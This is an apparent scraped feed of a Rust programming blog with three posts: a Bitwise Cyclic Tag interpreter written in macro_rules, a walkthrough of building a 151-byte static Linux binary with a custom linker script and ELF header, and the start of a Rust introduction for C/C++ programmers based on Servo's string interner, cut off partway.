main is usually a function ("char* main = &quot;usually a programming blog&quot;;") by keegan
http://mainisusuallyafunction.blogspot.com/

Turing tarpits in Rust&#39;s macro system (Sat, 21 Feb 2015)

<p><a href="http://esolangs.org/wiki/Bitwise_Cyclic_Tag">Bitwise Cyclic Tag</a> is an extremely simple automaton slash programming language. BCT uses a program string and a data string, each made of bits. The program string is interpreted as if it were infinite, by looping back around to the first bit.</p> <p>The program consists of commands executed in order. There is a single one-bit command:</p> <blockquote><p><strong>0</strong>: Delete the left-most data bit.</p></blockquote> <p>and a single two-bit command:</p> <blockquote><p><strong>1</strong> <em>x</em>: If the left-most data bit is 1, copy bit <em>x</em> to the right of the data string.</p></blockquote> <p>We halt if ever the data string is empty.</p> <p>Remarkably, this is enough to do <a href="http://esolangs.org/wiki/Turing_tarpit">universal computation</a>. 
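<p>Before looking at the macro version, here is a plain runtime sketch of the two BCT rules above, as ordinary Rust. The function name <code>bct_trace</code> and its signature are my own invention for illustration, not from the original post.</p>

```rust
// A runtime sketch of Bitwise Cyclic Tag: returns the successive data
// strings, starting with the initial one, for at most `max_steps` commands.
fn bct_trace(program: &str, data: &str, max_steps: usize) -> Vec<String> {
    let prog: Vec<u8> = program.bytes().collect();
    let mut data: Vec<u8> = data.bytes().collect();
    let mut trace = vec![String::from_utf8(data.clone()).unwrap()];
    let mut pc = 0; // program counter; the program string is cyclic

    for _ in 0..max_steps {
        if data.is_empty() {
            break; // halt on empty data string
        }
        match prog[pc % prog.len()] {
            b'0' => {
                // cmd 0: delete the left-most data bit
                data.remove(0);
                pc += 1;
            }
            _ => {
                // cmd 1 x: if the left-most data bit is 1, copy x to the right
                let x = prog[(pc + 1) % prog.len()];
                if data[0] == b'1' {
                    data.push(x);
                }
                pc += 2;
            }
        }
        trace.push(String::from_utf8(data.clone()).unwrap());
    }
    trace
}

fn main() {
    // Same program and data as the macro example below: 00111 ; 101
    for step in bct_trace("00111", "101", 11) {
        println!("{}", step);
    }
}
```

Running this on the program <code>00111</code> with data <code>101</code> reproduces the data strings seen in the macro trace below.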
Implementing it in <a href="http://doc.rust-lang.org/book/macros.html">Rust&#39;s macro system</a> gives a proof (probably not the first one) that Rust&#39;s macro system is Turing-complete, aside from the recursion limit imposed by the compiler.</p><pre id='rust-example-rendered' class='rust '><br /><span class='attribute'>#<span class='op'>!</span>[<span class='ident'>feature</span>(<span class='ident'>trace_macros</span>)]</span><br /><br /><span class='macro'>macro_rules</span><span class='macro'>!</span> <span class='ident'>bct</span> {<br /> <span class='comment'>// cmd 0: d ... =&gt; ...</span><br /> (<span class='number'>0</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>0</span> ; ));<br /> (<span class='number'>0</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>0</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));<br /><br /> <span class='comment'>// cmd 1p: 1 ... =&gt; 1 ... 
p</span><br /> (<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='number'>1</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));<br /> (<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='number'>1</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));<br /><br /> <span class='comment'>// cmd 1p: 0 ... 
=&gt; 0 ...</span><br /> (<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));<br /><br /> <span class='comment'>// halt on empty data string</span><br /> ( $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; )<br /> <span class='op'>=&gt;</span> (());<br />}<br /><br /><span class='kw'>fn</span> <span class='ident'>main</span>() {<br /> <span class='macro'>trace_macros</span><span class='macro'>!</span>(<span class='boolval'>true</span>);<br /> <span class='macro'>bct</span><span class='macro'>!</span>(<span class='number'>0</span>, <span class='number'>0</span>, <span class='number'>1</span>, <span class='number'>1</span>, <span class='number'>1</span> ; <span class='number'>1</span>, <span class='number'>0</span>, <span class='number'>1</span>);<br />}<br /></pre> <p>This produces the following compiler output:</p> <pre><code class="language-text">bct! { 0 , 0 , 1 , 1 , 1 ; 1 , 0 , 1 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 }<br />bct! { 1 , 1 , 1 , 0 , 0 ; 1 }<br />bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 1 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 1 , 0 }<br />bct! 
{ 1 , 1 , 1 , 0 , 0 ; 1 , 0 }<br />bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 0 , 1 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 0 , 1 , 0 }<br />bct! { 1 , 1 , 1 , 0 , 0 ; 0 , 1 , 0 }<br />bct! { 1 , 0 , 0 , 1 , 1 ; 0 , 1 , 0 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 , 0 }<br />bct! { 1 , 1 , 1 , 0 , 0 ; 1 , 0 }<br />bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 0 , 1 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 0 , 1 , 0 }<br />bct! { 1 , 1 , 1 , 0 , 0 ; 0 , 1 , 0 }<br />bct! { 1 , 0 , 0 , 1 , 1 ; 0 , 1 , 0 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 , 0 }<br />...<br />bct.rs:19:13: 19:45 error: recursion limit reached while expanding the macro `bct`<br />bct.rs:19 =&gt; (bct!($($ps),*, 1, $p ; $($ds),*));<br /> ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /></code></pre> <p>You can <a href="http://is.gd/AtL7bG">try it online</a>, as well.</p> <h1 id="notes-about-the-macro" class='section-header'>Notes about the macro</h1><p>I would much rather drop the commas and write</p><pre id='rust-example-rendered' class='rust '><br /><span class='comment'>// cmd 0: d ... =&gt; ...</span><br />(<span class='number'>0</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>)<span class='op'>*</span> <span class='number'>0</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span>));<br /><br /><span class='comment'>// cmd 1p: 1 ... =&gt; 1 ... 
p</span><br />(<span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; <span class='number'>1</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>)<span class='op'>*</span> <span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));<br /><br /><span class='comment'>// cmd 1p: 0 ... 
=&gt; 0 ...</span><br />(<span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>)<span class='op'>*</span> <span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span>));<br /></pre> <p>but this runs into the <a href="https://github.com/rust-lang/rfcs/blob/master/text/0550-macro-future-proofing.md">macro future-proofing rules</a>.</p> <p>If we&#39;re required to have commas, then it&#39;s at least nice to handle them uniformly, e.g.</p><pre id='rust-example-rendered' class='rust '><br /><span class='comment'>// cmd 0: d ... 
=&gt; ...</span><br />(<span class='number'>0</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>0</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));<br /><br /><span class='comment'>// cmd 1p: 1 ... =&gt; 1 ... p</span><br />(<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));<br /><br /><span class='comment'>// cmd 1p: 0 ... 
=&gt; 0 ...</span><br />(<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));<br /></pre> <p>But this too is disallowed. An <code>$x:tt</code> variable cannot be followed by a repetition <code>$(...)*</code>, even though it&#39;s (I believe) harmless. There is an <a href="https://github.com/rust-lang/rfcs/pull/733">open RFC</a> about this issue. For now I have to handle the &quot;one&quot; and &quot;more than one&quot; cases separately, which is annoying.</p> <p>In general, I don&#39;t think <code>macro_rules!</code> is a good language for arbitrary computation. This experiment shows the hassle involved in implementing one of the simplest known &quot;arbitrary computations&quot;. Rather, <code>macro_rules!</code> is good at expressing patterns of code reuse that <em>don&#39;t</em> require elaborate compile-time processing. It does so in a way that&#39;s declarative, hygienic, and high-level.</p> <p>However, there is a big middle ground of non-elaborate, but non-trivial computations. <code>macro_rules!</code> is hardly ideal for that, but <a href="http://doc.rust-lang.org/book/plugins.html#syntax-extensions">procedural macros</a> have problems of their own. 
Indeed, the <code>bct!</code> macro is an extreme case of a pattern I&#39;ve found useful in the real world. The idea is that every recursive invocation of a macro gives you another opportunity to pattern-match the arguments. Some of <a href="http://kmcallister.github.io/talks/rust/2014-rust-macros/slides.html">html5ever&#39;s macros</a> do this, for example.</p>

http://mainisusuallyafunction.blogspot.com/2015/02/turing-tarpits-in-rusts-macro-system.html

151-byte static Linux binary in Rust (Sun, 11 Jan 2015)

<p>Part of the sales pitch for <a href="http://www.rust-lang.org/">Rust</a> is that it&#39;s &quot;as bare metal as C&quot;.<sup id="fnref1"><a href="#fn1" rel="footnote">1</a></sup> Rust can do anything C can do, run anywhere C can run,<sup id="fnref2"><a href="#fn2" rel="footnote">2</a></sup> with code that&#39;s just as efficient, and at least as safe (but usually much safer).</p> <p>I&#39;d say this claim is about 95% true, which is pretty good by the standards of marketing claims. A while back I decided to put it to the test, by making the smallest, most self-contained Rust program possible. After resolving a <a href="https://github.com/rust-lang/rust/pull/17037">few</a> <a href="https://github.com/rust-lang/rust/pull/16970">issues</a> along the way, I ended up with a 151-byte, statically linked executable for AMD64 Linux. 
With the <a href="http://blog.rust-lang.org/2015/01/09/Rust-1.0-alpha.html">release of Rust 1.0-alpha</a>, it&#39;s time to show this off.</p> <p>Here&#39;s the Rust code:</p><pre class='rust '><br /><span class='attribute'>#<span class='op'>!</span>[<span class='ident'>crate_type</span><span class='op'>=</span><span class='string'>&quot;rlib&quot;</span>]</span><br /><span class='attribute'>#<span class='op'>!</span>[<span class='ident'>allow</span>(<span class='ident'>unstable</span>)]</span><br /><br /><span class='attribute'>#[<span class='ident'>macro_use</span>]</span> <span class='kw'>extern</span> <span class='kw'>crate</span> <span class='ident'>syscall</span>;<br /><br /><span class='kw'>use</span> <span class='ident'>std</span>::<span class='ident'>intrinsics</span>;<br /><br /><span class='kw'>fn</span> <span class='ident'>exit</span>(<span class='ident'>n</span>: <span class='ident'>usize</span>) <span class='op'>-&gt;</span> <span class='op'>!</span> {<br /> <span class='kw'>unsafe</span> {<br /> <span class='macro'>syscall</span><span class='macro'>!</span>(<span class='ident'>EXIT</span>, <span class='ident'>n</span>);<br /> <span class='ident'>intrinsics</span>::<span class='ident'>unreachable</span>()<br /> }<br />}<br /><br /><span class='kw'>fn</span> <span class='ident'>write</span>(<span class='ident'>fd</span>: <span class='ident'>usize</span>, <span class='ident'>buf</span>: <span class='kw-2'>&amp;</span>[<span class='ident'>u8</span>]) {<br /> <span class='kw'>unsafe</span> {<br /> <span class='macro'>syscall</span><span class='macro'>!</span>(<span class='ident'>WRITE</span>, <span class='ident'>fd</span>, <span class='ident'>buf</span>.<span class='ident'>as_ptr</span>(), <span class='ident'>buf</span>.<span class='ident'>len</span>());<br /> }<br />}<br /><br /><span class='attribute'>#[<span class='ident'>no_mangle</span>]</span><br /><span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>main</span>() {<br /> <span 
class='ident'>write</span>(<span class='number'>1</span>, <span class='string'>&quot;Hello!\n&quot;</span>.<span class='ident'>as_bytes</span>());<br /> <span class='ident'>exit</span>(<span class='number'>0</span>);<br />}<br /></pre> <p>This uses my <a href="https://crates.io/crates/syscall">syscall library</a>, which provides the <code>syscall!</code> macro. We wrap the underlying system calls with Rust functions, each exposing a safe interface to the <a href="http://doc.rust-lang.org/book/unsafe.html">unsafe</a> <code>syscall!</code> macro. The <code>main</code> function uses these two safe functions and doesn&#39;t need its own <code>unsafe</code>annotation. Even in such a small program, Rust allows us to isolate memory unsafety to a subset of the code.</p> <p>Because of <code>crate_type=&quot;rlib&quot;</code>, rustc will build this as a static library, from which we extract a single object file <code>tinyrust.o</code>:</p> <pre><code class="language-text">$ rustc tinyrust.rs \<br /> -O -C no-stack-check -C relocation-model=static \<br /> -L syscall.rs/target<br />$ ar x libtinyrust.rlib tinyrust.o<br />$ objdump -dr tinyrust.o<br />0000000000000000 &lt;main&gt;:<br /> 0: b8 01 00 00 00 mov $0x1,%eax<br /> 5: bf 01 00 00 00 mov $0x1,%edi<br /> a: be 00 00 00 00 mov $0x0,%esi<br /> b: R_X86_64_32 .rodata.str1625<br /> f: ba 07 00 00 00 mov $0x7,%edx<br /> 14: 0f 05 syscall <br /> 16: b8 3c 00 00 00 mov $0x3c,%eax<br /> 1b: 31 ff xor %edi,%edi<br /> 1d: 0f 05 syscall <br /></code></pre> <p>We disable stack exhaustion checking, as well as position-independent code, in order to slim down the output. After optimization, the only instructions that survive come from <a href="https://github.com/kmcallister/syscall.rs/blob/master/src/platform/linux-x86_64/mod.rs">inline assembly blocks in the syscall library</a>.</p> <p>Note that <code>main</code> doesn&#39;t end in a <code>ret</code> instruction. 
The <code>exit</code> function (which gets inlined) is marked with a &quot;return type&quot; of <code>!</code>, meaning <a href="http://doc.rust-lang.org/reference.html#diverging-functions">&quot;doesn&#39;t return&quot;</a>. We make good on this by invoking the <a href="http://llvm.org/docs/LangRef.html#unreachable-instruction"><code>unreachable</code> intrinsic</a> after <code>syscall!</code>. <a href="http://llvm.org">LLVM</a> will optimize under the assumption that we can never reach this point, making no guarantees about the program behavior if it is reached. This represents the fact that the kernel is actually going to kill the process before <code>syscall!(EXIT, n)</code> can return.</p> <p>Because we use inline assembly and intrinsics, this code is not going to work on a <a href="http://blog.rust-lang.org/2014/10/30/Stability.html">stable-channel build</a> of Rust 1.0. It will require an alpha or nightly build until such time as inline assembly and <code>intrinsics::unreachable</code> are added to the stable language of Rust 1.x.</p> <p>Note that I didn&#39;t even use <code>#![no_std]</code>! This program is so tiny that everything it pulls from libstd is a type definition, macro, or fully inlined function. As a result there&#39;s nothing of libstd left in the compiler output. In a larger program you may need <code>#![no_std]</code>, although its role is <a href="https://github.com/rust-lang/rust/issues/20537">greatly reduced</a> following the <a href="https://github.com/rust-lang/rust/pull/19654">removal of Rust&#39;s runtime</a>.</p> <h1 id="linking" class='section-header'>Linking</h1><p>This is where things get weird.</p> <p>Whether we compile from C or Rust,<sup id="fnref3"><a href="#fn3" rel="footnote">3</a></sup> the standard linker toolchain is going to include a bunch of junk we don&#39;t need. 
So I cooked up my own <a href="https://sourceware.org/binutils/docs/ld/Scripts.html">linker script</a>:</p> <pre><code class="language-text">SECTIONS {<br /> . = 0x400078;<br /> <br /> combined . : AT(0x400078) ALIGN(1) SUBALIGN(1) {<br /> *(.text*)<br /> *(.data*)<br /> *(.rodata*)<br /> *(.bss*)<br /> }<br />}<br /></code></pre> <p>We smash all the sections together, with no alignment padding, then extract that section as a headerless binary blob:</p> <pre><code class="language-text">$ ld --gc-sections -e main -T script.ld -o payload tinyrust.o<br />$ objcopy -j combined -O binary payload payload.bin<br /></code></pre> <p>Finally we stick this on the end of a custom ELF header. The header is written in <a href="http://www.nasm.us/">NASM</a> syntax but contains no instructions, only data fields. The base address <code>0x400078</code> seen above is the end of this header, when the whole file is loaded at <code>0x400000</code>. There&#39;s no guarantee that <code>ld</code> will put <code>main</code> at the beginning of the file, so we need to separately determine the address of <code>main</code> and fill that in as the <code>e_entry</code> field in the ELF file header.</p> <pre><code class="language-text">$ ENTRY=$(nm -f posix payload | grep &#39;^main &#39; | awk &#39;{print $3}&#39;)<br />$ nasm -f bin -o tinyrust -D entry=0x$ENTRY elf.s<br />$ chmod +x ./tinyrust<br />$ ./tinyrust<br />Hello!<br /></code></pre> <p>It works! And the size:</p> <pre><code class="language-text">$ wc -c &lt; tinyrust<br />158<br /></code></pre> <p>Seven bytes too big!</p> <h1 id="the-final-trick" class='section-header'>The final trick</h1><p>To get down to 151 bytes, I took inspiration from <a href="http://www.muppetlabs.com/%7Ebreadbox/software/tiny/teensy.html">this classic article</a>, which observes that padding fields in the ELF header can be used to store other data. 
Like, say, <a href="https://github.com/kmcallister/tiny-rust-demo/blob/97975946aad62625c28d053c2396ee5d2609a90c/elf.s#L11-L12">a string constant</a>. The Rust code changes to access this constant:</p><pre class='rust '><br /><span class='kw'>use</span> <span class='ident'>std</span>::{<span class='ident'>mem</span>, <span class='ident'>raw</span>};<br /><br /><span class='attribute'>#[<span class='ident'>no_mangle</span>]</span><br /><span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>main</span>() {<br /> <span class='kw'>let</span> <span class='ident'>message</span>: <span class='kw-2'>&amp;</span><span class='lifetime'>&#39;static</span> [<span class='ident'>u8</span>] <span class='op'>=</span> <span class='kw'>unsafe</span> {<br /> <span class='ident'>mem</span>::<span class='ident'>transmute</span>(<span class='ident'>raw</span>::<span class='ident'>Slice</span> {<br /> <span class='ident'>data</span>: <span class='number'>0x00400008</span> <span class='kw'>as</span> <span class='op'>*</span><span class='kw'>const</span> <span class='ident'>u8</span>,<br /> <span class='ident'>len</span>: <span class='number'>7</span>,<br /> })<br /> };<br /><br /> <span class='ident'>write</span>(<span class='number'>1</span>, <span class='ident'>message</span>);<br /> <span class='ident'>exit</span>(<span class='number'>0</span>);<br />}<br /></pre> <p>A Rust <a href="http://doc.rust-lang.org/book/arrays-vectors-and-slices.html">slice</a>like <code>&amp;[u8]</code> consists of a pointer to some memory, and a length indicating the number of elements that may be found there. The module <a href="http://doc.rust-lang.org/std/raw/index.html"><code>std::raw</code></a> exposes this as an ordinary struct that we build, then <a href="http://doc.rust-lang.org/std/mem/fn.transmute.html">transmute</a> to the actual slice type. 
The <code>transmute</code> function generates no code; it just tells the type checker to treat our <code>raw::Slice&lt;u8&gt;</code> as if it were a <code>&amp;[u8]</code>. We return this value out of the <code>unsafe</code> block, taking advantage of the &quot;everything is an expression&quot; syntax, and then print the message as before.</p> <p>Trying out the new version:</p> <pre><code class="language-text">$ rustc tinyrust.rs \<br /> -O -C no-stack-check -C relocation-model=static \<br /> -L syscall.rs/target<br />$ ar x libtinyrust.rlib tinyrust.o<br />$ objdump -dr tinyrust.o<br />0000000000000000 &lt;main&gt;: <br /> 0: b8 01 00 00 00 mov $0x1,%eax<br /> 5: bf 01 00 00 00 mov $0x1,%edi<br /> a: be 08 00 40 00 mov $0x400008,%esi<br /> f: ba 07 00 00 00 mov $0x7,%edx<br /> 14: 0f 05 syscall <br /> 16: b8 3c 00 00 00 mov $0x3c,%eax<br /> 1b: 31 ff xor %edi,%edi<br /> 1d: 0f 05 syscall <br /><br />...<br />$ wc -c &lt; tinyrust<br />151<br />$ ./tinyrust<br />Hello!<br /></code></pre> <p>The object code is the same as before, except that the relocation for the string constant has become an absolute address. The binary is smaller by 7 bytes (the size of <code>&quot;Hello!\n&quot;</code>) and it still works!</p> <p>You can find the full code <a href="https://github.com/kmcallister/tiny-rust-demo">on GitHub</a>. The code in this article works on rustc 1.0.0-dev (44a287e6e 2015-01-08). If I update the code on GitHub, I will also update the version number printed by the included build script.</p> <p>I&#39;d be curious to hear if anyone can make my program smaller!</p> <div class="footnotes"><hr><ol> <li id="fn1"><p>C is not really &quot;bare metal&quot;, but that&#39;s <a href="http://blog.llvm.org/2011/05/what-every-c-programmer-should-know.html">another story</a>.&nbsp;<a href="#fnref1" rev="footnote">&#8617;</a></p></li> <li id="fn2"><p>From a pure language perspective. 
If you want to talk about availability of compilers and libraries, then Rust still has a <em>bit</em> of a disadvantage ;)&nbsp;<a href="#fnref2" rev="footnote">&#8617;</a></p></li> <li id="fn3"><p>In fact, this code grew out of an earlier experiment with really small binaries in C.&nbsp;<a href="#fnref3" rev="footnote">&#8617;</a></p></li> </ol> </div>

http://mainisusuallyafunction.blogspot.com/2015/01/151-byte-static-linux-binary-in-rust.html

A taste of Rust (yum) for C/C++ programmers (Wed, 29 Oct 2014)

<p>If, like me, you&#39;ve been frustrated with the status quo in systems languages, this article will give you a taste of why Rust is so exciting. In a tiny amount of code, it shows a lot of ways that Rust really kicks ass compared to C and C++. It&#39;s not just safe and fast, it&#39;s a lot more convenient.</p> <p>Web browsers do <a href="http://en.wikipedia.org/wiki/String_interning">string interning</a> to condense the strings that make up the Web, such as tag and attribute names, into small values that can be compared quickly. I recently added event logging support to <a href="https://github.com/servo/servo">Servo</a>&#39;s string interner. 
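<p>To make the interning idea concrete, here is a toy interner along the lines just described: each distinct string maps to a small integer ID, so later comparisons are integer compares. This is my own illustrative sketch; Servo&#39;s actual interner is considerably more sophisticated, and all names here are made up.</p>

```rust
use std::collections::HashMap;

// Toy string interner: hands out a small u64 ID per distinct string,
// so equality checks on interned names become integer comparisons.
#[derive(Default)]
struct Interner {
    ids: HashMap<String, u64>,
    strings: Vec<String>,
}

impl Interner {
    fn intern(&mut self, s: &str) -> u64 {
        if let Some(&id) = self.ids.get(s) {
            return id; // already interned: reuse the existing ID
        }
        let id = self.strings.len() as u64;
        self.strings.push(s.to_string());
        self.ids.insert(s.to_string(), id);
        id
    }
}

fn main() {
    let mut interner = Interner::default();
    let a = interner.intern("div");
    let b = interner.intern("span");
    let c = interner.intern("div");
    assert_eq!(a, c); // same string, same ID
    assert_ne!(a, b); // different strings, different IDs
    println!("div={} span={}", a, b);
}
```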
This will allow us to record traces from real websites, which we can use to guide further optimizations.</p> <p>Here are the events we can log:</p><pre class='rust '><br /><span class='attribute'>#[<span class='ident'>deriving</span>(<span class='ident'>Show</span>)]</span><br /><span class='kw'>pub</span> <span class='kw'>enum</span> <span class='ident'>Event</span> {<br /> <span class='ident'>Intern</span>(<span class='ident'>u64</span>),<br /> <span class='ident'>Insert</span>(<span class='ident'>u64</span>, <span class='ident'>String</span>),<br /> <span class='ident'>Remove</span>(<span class='ident'>u64</span>),<br />}<br /></pre> <p>Interned strings have a 64-bit ID, which is recorded in every event. The <a href="http://doc.rust-lang.org/std/string/struct.String.html"><code>String</code></a>we store for &quot;insert&quot; events is like C++&#39;s <code>std::string</code>; it points to a buffer in the heap, and it owns that buffer.</p> <p>This <a href="http://doc.rust-lang.org/guide.html#enums"><code>enum</code></a> is a bit fancier than a C <code>enum</code>, but its representation in memory is no more complex than a C <code>struct</code>. There&#39;s a tag for the three alternatives, a 64-bit ID, and a few fields that make up the <code>String</code>. When we pass or return an <code>Event</code> by value, it&#39;s at worst a <code>memcpy</code>of a few dozen bytes. There&#39;s no implicit heap allocation, garbage collection, or anything like that. 
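<p>For readers on current Rust: <code>deriving(Show)</code> is pre-1.0 syntax. A sketch of the same enum in today&#39;s spelling, with a quick look at how small the by-value representation actually is (the exact byte count is implementation-defined; the bound checked here is my own conservative assumption):</p>

```rust
use std::mem;

// The same Event enum in modern syntax: #[derive(Debug)] replaces the
// pre-1.0 #[deriving(Show)] used in the post.
#[derive(Debug)]
pub enum Event {
    Intern(u64),
    Insert(u64, String),
    Remove(u64),
}

fn main() {
    let e = Event::Insert(7, String::from("div"));
    // Auto-generated text representation, as discussed above.
    println!("{:?}", e);
    // Passing an Event by value copies/moves only this many bytes;
    // no implicit heap allocation beyond the String's own buffer.
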